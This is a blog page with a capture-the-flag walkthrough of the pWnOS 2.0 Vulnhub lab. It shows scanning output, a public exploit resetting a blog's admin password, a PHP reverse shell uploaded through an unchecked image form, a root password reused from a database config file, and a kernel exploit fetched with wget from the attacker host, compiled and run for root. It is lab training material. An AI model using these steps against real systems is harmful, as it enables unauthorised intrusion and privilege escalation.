<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="DescriptionI know, it’s a very old machine (2011), but I was just searching for OSCP like Vulnhub boxes and I saw this machine mentioned in a blog post. Since I’m trying to prepare for that certifi">
<meta name="keywords" content="vulnhub,ctf,walkthrough">
<meta property="og:type" content="article">
<meta property="og:title" content="pWnOS 2.0 - Walkthrough">
<meta property="og:url" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/index.html">
<meta property="og:site_name" content="InfoSec Adventures">
<meta property="og:description" content="DescriptionI know, it’s a very old machine (2011), but I was just searching for OSCP like Vulnhub boxes and I saw this machine mentioned in a blog post. Since I’m trying to prepare for that certifi">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/pwnos2.0.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/pageinfo.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/login.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/registration.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/burp1.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/burp2.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/burp3.png">
<meta property="og:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/cmd.png">
<meta property="og:updated_time" content="2019-05-11T15:04:29.291Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pWnOS 2.0 - Walkthrough">
<meta name="twitter:description" content="DescriptionI know, it’s a very old machine (2011), but I was just searching for OSCP like Vulnhub boxes and I saw this machine mentioned in a blog post. Since I’m trying to prepare for that certifi">
<meta name="twitter:image" content="https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/pwnos2.0.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    

    <title>pWnOS 2.0 - Walkthrough</title>

    <link rel="stylesheet" href="/css/style.css">
    
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    
    
    
      <link rel="alternate" href="/atom.xml" title="InfoSec Adventures" type="application/atom+xml">
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/instagram/">Instagram Feed</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/01/21/Identifying-and-Cracking-Hashes/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2018/12/24/The-Affine-Cipher/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/&text=pWnOS 2.0 - Walkthrough"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/&title=pWnOS 2.0 - Walkthrough"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=pWnOS 2.0 - Walkthrough&body=Check out this article: https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/&title=pWnOS 2.0 - Walkthrough"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Description"><span class="toc-number">1.</span> <span class="toc-text">Description</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Port-scanning"><span class="toc-number">1.1.</span> <span class="toc-text">Port scanning</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Busting-directories"><span class="toc-number">1.2.</span> <span class="toc-text">Busting directories</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Discovering-the-blog"><span class="toc-number">1.3.</span> <span class="toc-text">Discovering the blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploiting-the-blog"><span class="toc-number">1.4.</span> <span class="toc-text">Exploiting the blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-root-access"><span class="toc-number">1.5.</span> <span class="toc-text">Getting root access</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-root-again"><span class="toc-number">1.6.</span> <span class="toc-text">Getting root again</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Before-you-go"><span class="toc-number">1.7.</span> <span class="toc-text">Before you go</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        pWnOS 2.0 - Walkthrough
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">InfoSec Adventures</span>
      </span>
      
    <div class="postdate">
        <time datetime="2019-01-09T12:20:06.000Z" itemprop="datePublished">2019.01.09.</time>
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF-Walkthroughs/">CTF Walkthroughs</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/ctf/">ctf</a>, <a class="tag-link" href="/tags/vulnhub/">vulnhub</a>, <a class="tag-link" href="/tags/walkthrough/">walkthrough</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5bf72b3154516f79"></script>

<p><img src="pwnos2.0.png" alt></p>
<h1 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h1><p>I know, it’s a very old machine (2011), but I was just searching for OSCP like Vulnhub boxes and I saw this machine mentioned in a blog post. Since I’m trying to prepare for that certification, I thought it might be a good idea to do some older boxes for practice. The goal of the machine is to get root, so there are no flags. Note that this machine won’t work with VirtualBox out of the box. I had to create a NAT network within the 10.10.10.0/24 network range and configure both VM to use this network.<br>Download it from here: <a href="https://www.vulnhub.com/entry/pwnos-20-pre-release,34/" target="_blank" rel="noopener">pWnOS 2.0 on Vulnhub</a></p>
<h2 id="Port-scanning"><a href="#Port-scanning" class="headerlink" title="Port scanning"></a>Port scanning</h2><pre><code>root@kali:~# nmap -A -sC -F 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00019s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-server-header: Apache/2.2.17 (Ubuntu)
| http-title: Welcome to this Site!
MAC Address: 08:00:27:60:1C:37 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 10.10.10.100
</code></pre><p>Usual stuff, let’s investigate on the web server using <code>dirb</code>.</p>
<h2 id="Busting-directories"><a href="#Busting-directories" class="headerlink" title="Busting directories"></a>Busting directories</h2><p>I tend to use dirb, but there are other tools for this purpose, like nikto or dirbuster. Anyway, here is the result:</p>
<pre><code>root@kali:~# dirb http://10.10.10.100

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)                               
==&gt; DIRECTORY: http://10.10.10.100/blog/                                       
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)                            
==&gt; DIRECTORY: http://10.10.10.100/includes/                                   
+ http://10.10.10.100/index (CODE:200|SIZE:854)                                
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)                            
+ http://10.10.10.100/info (CODE:200|SIZE:50171)                               
+ http://10.10.10.100/info.php (CODE:200|SIZE:50040)                           
+ http://10.10.10.100/login (CODE:200|SIZE:1174)                               
+ http://10.10.10.100/register (CODE:200|SIZE:1562)                            
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)                        

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)                               
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)                           
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)                        
==&gt; DIRECTORY: http://10.10.10.100/blog/config/                                
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5918)                        
==&gt; DIRECTORY: http://10.10.10.100/blog/content/                          
==&gt; DIRECTORY: http://10.10.10.100/blog/docs/                                  
==&gt; DIRECTORY: http://10.10.10.100/blog/flash/                                 
==&gt; DIRECTORY: http://10.10.10.100/blog/images/                                
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)                          
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)                      
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)                              
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)                          
==&gt; DIRECTORY: http://10.10.10.100/blog/interface/                             
==&gt; DIRECTORY: http://10.10.10.100/blog/languages/                             
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5667)                          
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)                            
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)                           
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)                            
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)                            
==&gt; DIRECTORY: http://10.10.10.100/blog/scripts/                               
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4951)                         
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)                             
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)                            
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5309)                          
==&gt; DIRECTORY: http://10.10.10.100/blog/themes/                                
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)                         
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
</code></pre><p>It looks like, there’s is a different site or probably a blog installed under the blog directory. Let’s find out!</p>
<h2 id="Discovering-the-blog"><a href="#Discovering-the-blog" class="headerlink" title="Discovering the blog"></a>Discovering the blog</h2><p>Yes, it is a basic blog. Page Info helped me to find out, what this site is running.</p>
<p><img src="pageinfo.png" alt="The Page Info" title="The Page Info"></p>
<p>As you can see, the generator is <code>Simple PHP Blog 0.4.0</code> and quickly searched for this to see if it has any vulnerabilities. Actually, I found quite a few vulnerabilities. I also searched with searchsploit and decided to use use the first exploit.</p>
<pre><code>root@kali:~# searchsploit simple PHP blog 0.4.0
--------------------------------------------------------------- ------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ------------------------------
Simple PHP Blog 0.4.0 - Multiple Remote s                      | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)  | exploits/php/webapps/16883.rb
--------------------------------------------------------------- ------------------------------
Shellcodes: No Result
</code></pre><h2 id="Exploiting-the-blog"><a href="#Exploiting-the-blog" class="headerlink" title="Exploiting the blog"></a>Exploiting the blog</h2><p>I might have overcomplicated the exploitation, but here is how I did it. First, I set a new username and password combination (admin/admin).</p>
<pre><code>root@kali:~# perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin
________________________________________________________________________________
          SimplePHPBlog v0.4.0 Exploits
                 by
             Kenneth F. Belva, CISSP
            http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)
</code></pre><p>Then, I logged in and started looking for oportunities to upload a reverse shell.</p>
<p><img src="login.png" alt="Login" title="Login"></p>
<p>Hmmm… Image upload? Hell yess! They didn’t even check the extension… Moreover, there was directory listing enable in the <code>/blog/images</code> directory. So, I could easily select and trigger my PHP reverse shell. Previously, I set up my netcat listening on port 1234 and now I got the connection back I was waiting for.</p>
<pre><code>root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown host
connect to [10.10.10.4] from (UNKNOWN) [10.10.10.100] 48103
Linux web 2.6.38-8-server #42-Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux
 08:59:11 up 17:51,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can&apos;t access tty; job control turned off
$ python -c &apos;import pty; pty.spawn(&quot;/bin/bash&quot;)&apos;
www-data@web:/$
</code></pre><div class="addthis_tipjar_inline"></div>

<h2 id="Getting-root-access"><a href="#Getting-root-access" class="headerlink" title="Getting root access"></a>Getting root access</h2><p>In the web root, I found a <code>mysqli_connect.php</code> file, but the credentials didn’t work. However, there was a similar file in the <code>/var</code> directory and it was gold!</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="comment"># Script 8.2 - mysqli_connect.php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// This file contains the database access information.</span></span><br><span class="line"><span class="comment">// This file also establishes a connection to MySQL</span></span><br><span class="line"><span class="comment">// and selects the database.</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Set the database access information as constants:</span></span><br><span class="line"></span><br><span class="line">DEFINE (<span class="string">'DB_USER'</span>, <span class="string">'root'</span>);</span><br><span class="line">DEFINE (<span class="string">'DB_PASSWORD'</span>, <span class="string">'root@ISIntS'</span>);</span><br><span class="line">DEFINE (<span class="string">'DB_HOST'</span>, <span class="string">'localhost'</span>);</span><br><span class="line">DEFINE (<span class="string">'DB_NAME'</span>, <span class="string">'ch16'</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Make the connection:</span></span><br><span class="line"></span><br><span class="line">$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME)</span><br><span class="line"><span class="keyword">OR</span> <span class="keyword">die</span> (<span class="string">'Could not connect to MySQL: '</span> . mysqli_connect_error() );</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>I mean, the password was actually the root password.</p>
<pre><code>www-data@web:/var$ su root
su root
Password: root@ISIntS
root@web:/var# id
uid=0(root) gid=0(root) groups=0(root)
</code></pre><p>But, I didn’t stop here. I wanted to find other ways to get in. So, I went back to the original site and started poking around. After I didn’t find anything useful, I registered with a test account.</p>
<p><img src="registration.png" alt="Registration page" title="Registration page"></p>
<p>Of course, I fired up Burp Suite to see and modify the requests. I found an SQL injection vulnerability in the email field.</p>
<p><img src="burp1.png" alt="Locating the SQL injection" title="Locating the SQL injection"><br><img src="burp2.png" alt="How many columns are there?" title="How many columns are there?"><br><img src="burp3.png" alt="Creating a file to run commands" title="Creating a file to run commands"></p>
<p>I should note here, that on the picture I named the PHP file as <code>shell.php</code>, but I successfully messed things up and I ended with another file named <code>cmd.php</code>.</p>
<p><img src="cmd.png" alt="Running commands" title="Running commands"></p>
<h2 id="Getting-root-again"><a href="#Getting-root-again" class="headerlink" title="Getting root again"></a>Getting root again</h2><p>I thought, there must be another way in like a kernel exploit. I started searching and trying out different exploits until I found a working one. Launched my local web server and delivered the source code. I knew, there was a gcc compiler on the machine so all I had to do is transfer the code, compile and run.</p>
<pre><code>$ wget http://10.10.10.4:8000/25444.c
--2019-01-09 12:27:14--  http://10.10.10.4:8000/25444.c
Connecting to 10.10.10.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2835 (2.8K) [text/plain]
Saving to: `25444.c&apos;

     0K ..                                                    100%  568M=0s

2019-01-09 12:27:14 (568 MB/s) - `25444.c&apos; saved [2835/2835]

$ ls
25444.c
$ gcc -O2 25444.c
$ chmod +x a.out
$ python -c &quot;import pty; pty.spawn(&apos;/bin/bash&apos;)&quot;
www-data@web:/tmp$ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
root@web:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@web:/tmp#
</code></pre><h2 id="Before-you-go"><a href="#Before-you-go" class="headerlink" title="Before you go"></a>Before you go</h2><p>If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!</p>
<p><br><div align="center" class="addthis_inline_share_toolbox"></div><br></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/instagram/">Instagram Feed</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Description"><span class="toc-number">1.</span> <span class="toc-text">Description</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Port-scanning"><span class="toc-number">1.1.</span> <span class="toc-text">Port scanning</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Busting-directories"><span class="toc-number">1.2.</span> <span class="toc-text">Busting directories</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Discovering-the-blog"><span class="toc-number">1.3.</span> <span class="toc-text">Discovering the blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploiting-the-blog"><span class="toc-number">1.4.</span> <span class="toc-text">Exploiting the blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-root-access"><span class="toc-number">1.5.</span> <span class="toc-text">Getting root access</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Getting-root-again"><span class="toc-number">1.6.</span> <span class="toc-text">Getting root again</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Before-you-go"><span class="toc-number">1.7.</span> <span class="toc-text">Before you go</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/&text=pWnOS 2.0 - Walkthrough"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/&title=pWnOS 2.0 - Walkthrough"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=pWnOS 2.0 - Walkthrough&body=Check out this article: https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://infosecadventures.com/2019/01/09/pWnOS-2-0-Walkthrough/&title=pWnOS 2.0 - Walkthrough"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <!--<a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>-->
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Kristof Toth
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/instagram/">Instagram Feed</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-131012780-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'infosecadventures';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


